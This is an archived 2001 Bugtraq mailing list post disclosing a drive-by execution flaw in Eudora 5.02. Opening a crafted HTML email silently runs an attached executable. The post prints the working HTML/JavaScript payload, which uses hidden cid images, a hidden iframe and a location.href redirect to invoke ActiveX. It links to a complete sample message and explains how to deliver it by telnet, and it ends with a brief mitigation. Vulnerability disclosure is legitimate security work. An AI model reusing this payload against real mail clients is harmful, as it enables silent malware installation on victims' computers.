Bugtraq mailing list archives
feeble.you!dora.exploit
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Sun, 18 Mar 2001 01:38:46 -0800
Sunday, March 18, 2001 Silent delivery and installation of an executable on a target computer. No client input other than opening an email using Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer' and 'allow executables in HTML content' are enabled. One wonders why they are there in the first place. This can be achieved with relative ease as follows: 1. Create yet another HTML mail message as follows: <img SRC="cid:mr.malware.to.you" style="display:none"> <img id=W0W src="cid:malware.com" style="display:none"> <center><h6>YOU!DORA</h6></center> <IFRAME id=malware width=10 height=10 style="display:none" ></IFRAME> <script> // 18.03.01 http://www.malware.com malware.location.href=W0W.src </script> Where our first image is our executable. Our second image comprises a simple JavaScripting and ActiveX control. What happens is, once the mail message is opened in Eudora 5.02 - Sponsored Mode, the two 'embedded' images are silently and instantly transferred to the 'Embedded' folder. Our very simple JavaScript location.href then automatically calls our second image comprising the simple JavaScripting and ActiveX control [note: knowing the file names and locations are not necessary at all], which is then displayed out of sight in our iframe. This inturn executes our *.exe. Very simple. Because our *.exe and our simple JavaScripting and ActiveX control reside in the same folder [the so-called "Embedded' folder], and because it is automatically called to our iframe, everything is instant. No warning, no nothing. The *.exe is executed instantly. No client input other than opening the email. 2. Working Example. Harmless *.exe. incorporated. Tested on win98, with IE5.5 (all of its patches and so-called service packs), Eudora 5.02 - Sponsored Mode with 'use Microsoft viewer' and 'allow executables in HTML content' (this refers to scripting, not literally executables). The following is in plaintext. We are unable to figure out how to import a single message into Eudora's inbox. Perhaps some bright spark knows. Otherwise, incorporate the text sample into a telnet session or other and fire off to your Eudora inbox: http://www.malware.com/you!DORA.txt Notes: disable 'use Microsoft viewer' and 'allow executables in HTML content' --- http://www.malware.com _______________________________________________________ Send a cool gift with your E-Card http://www.bluemountain.com/giftcenter/
Current thread:
- feeble.you!dora.exploit http-equiv () excite com (Mar 19)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 20)
- <Possible follow-ups>
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 22)